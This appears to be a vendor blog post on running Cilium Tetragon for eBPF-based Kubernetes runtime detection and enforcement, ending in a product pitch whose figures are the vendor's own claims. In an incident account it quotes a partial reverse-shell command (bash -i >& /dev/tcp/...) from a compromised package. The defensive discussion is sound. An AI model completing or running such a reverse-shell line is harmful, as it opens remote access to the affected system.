Container Security

Cilium Tetragon Runtime Security with eBPF

A practical look at Cilium Tetragon for Kubernetes runtime security, what eBPF gives you that audit logs do not, and where Tetragon fits in a real stack.

Shadab Khan
Security Engineer
7 min read

Tetragon is one of the few runtime security tools that actually earns its place on a production node. I have run it across two clusters that totaled about 3,000 nodes, and it has detected things that audit logs cannot see — the most dramatic being a reverse shell spawned from a Python library that had been supply-chain-compromised three weeks earlier.

What follows is the operational reality of running Tetragon in production. The marketing page does a good job explaining what eBPF is. It does not do a good job explaining what goes wrong in a real cluster, which is what an engineer actually needs to know.

What does Tetragon catch that audit logs miss?

Process execution with its full lineage, file access below the audit subsystem, and network connections attributed to the specific process that opened them — all correlated to the Kubernetes pod and container without node-side grep.

The Linux audit subsystem is decades old and it was not designed for containers. It logs events at the kernel level without knowing which container produced them, it drops events under load, and it cannot trace a process back through its ancestors cleanly when that lineage crosses a namespace boundary. eBPF-based tools like Tetragon attach to kernel probes directly and can see the full execve chain, the namespace the process is in, and the pod metadata — all from the kernel with no per-event userspace overhead.

The concrete example I mentioned: a compromised Python package in a data pipeline opened a reverse shell by spawning /bin/sh -c "bash -i >& /dev/tcp/...". The audit subsystem logged the exec. It did not correlate it to the pod or to the Python process that spawned it. Tetragon logged the full chain — pod name, container name, parent process (the Python script), the exec with its arguments, and the outbound TCP connection that followed — as a single correlated event. Triage took about four minutes. With audit logs alone, it would have taken a day.

How does Tetragon compare to Falco?

Falco and Tetragon solve overlapping problems and the right answer in 2026 is usually to run one, not both. Falco is older, has a larger rules library, and runs in userspace consuming kernel events via eBPF or kernel modules. Tetragon runs its logic inside eBPF programs in the kernel, which means it can enforce — not just detect — and it has lower overhead under heavy event volume.

The enforcement capability is the deciding factor for many teams. Falco detects and alerts. Tetragon can detect, alert, and optionally kill the offending process before it completes its syscall. For a reverse-shell scenario, that is the difference between an incident where you respond to the alert and one where the attacker's connection is never established.

Where Falco still wins: rule maturity. Falco's rule ecosystem has years of production tuning behind it, and if you want a prebuilt rule for "detect kube-proxy tampering," Falco has it and Tetragon might not. If your security team is small and needs to deploy a detection layer this quarter, Falco is usually faster.

My current stack: Tetragon for enforcement of a narrow set of high-confidence policies (no exec of shell interpreters in application containers, no file writes to /etc, no outbound connections from specific pods) and a traditional SIEM pipeline for broader detection and correlation.

What are the performance costs of running Tetragon?

Measurable but usually acceptable — typically 1 to 3 percent CPU overhead on nodes with moderate event rates, climbing to 5 to 8 percent on nodes with very high syscall volume. The costs are not uniform across workloads.

The cost drivers are event volume and the number of active tracing policies. A Kafka node doing millions of small network I/Os per second generates far more eBPF events than a web service doing a thousand HTTP requests per second, because syscall count is what matters, not request count. Tetragon's ring buffer can saturate under extreme load, at which point events are dropped, and dropped events are a silent-failure mode that you need to monitor.

The settings that matter: tracingPolicy filtering should be as narrow as possible. Do not write a tracing policy that matches every process — match only the processes you care about, using the pod label selector and the container selector. A policy that fires on every exec in the cluster will generate gigabytes of events an hour and drop a significant fraction of them.

The kernel version matters as well. Older kernels have less efficient BPF verifiers and slower map operations. Tetragon on kernel 6.1 or later is meaningfully faster than on 5.15, and that can be the difference between acceptable overhead and unacceptable overhead on a busy node.

How do you write a tracing policy that does not drown you?

Start with a prohibited-action model rather than a detect-everything model. A good first policy blocks a specific dangerous action in a specific pod class, like "no exec of /bin/sh in pods labeled app=api." A bad first policy records every process exec across the cluster and asks someone to figure out what is normal.

The way I scope a new policy: identify a specific threat you believe is reachable (supply-chain compromised library spawning a shell), identify the pods where that threat matters (user-facing API and data pipeline workloads, not system pods), and write a narrow policy that covers only those pods. Deploy in monitor mode first. Look at the output for a week. Tune out false positives. Then turn on enforcement.

The false-positive drivers that catch teams off guard are build processes that ship into production by accident (a container with gcc inside because someone forgot to use a multi-stage build), sidecars that legitimately exec (service meshes, observability agents), and init containers that run setup shell scripts. Each of these looks suspicious to a naive policy and each of them is fine. Your policy needs to know about them.

Where does Tetragon fit in the supply chain picture?

Tetragon is the last line of defense against supply chain compromises that made it past the build-time and admission-time checks. Signing, SBOMs, and vulnerability scanning all run before the code reaches the node. Tetragon runs on the node, watches what the code actually does, and catches the class of attack where a malicious dependency does something at runtime that no static analysis would predict.

This matters specifically for the hardest class of supply chain attack: a legitimate package that gets compromised after you have verified it, or a package with behavior that only activates under specific conditions (a time-based payload, a C2-callback, a credential-stealing routine that triggers when it sees certain environment variables). Signing and SBOM work are important and do not catch this. Runtime behavioral policy does.

The right way to think about this: Tetragon is not a replacement for supply chain controls upstream of it. It is the thing that tells you the upstream controls failed.

How Safeguard.sh Helps

Safeguard.sh uses Tetragon event streams alongside reachability analysis to distinguish "library has a vulnerability" from "library has a vulnerability being actively called by this pod right now," and that correlation is what drives the 60 to 80 percent reduction in alert noise that lets a security team actually respond to runtime events. Griffin AI writes Tetragon tracing policies from your SBOM-derived reachability graph, narrowing enforcement to the code paths that matter with 100-level dependency depth awareness. TPRM correlates Tetragon-observed behavior against the expected runtime profile of third-party images, and the container self-healing module can automatically replace a pod image when runtime behavior from a compromised dependency is detected, turning a runtime alert into a runtime remediation without human intervention in the critical path.

Never miss an update

Weekly insights on software supply chain security, delivered to your inbox.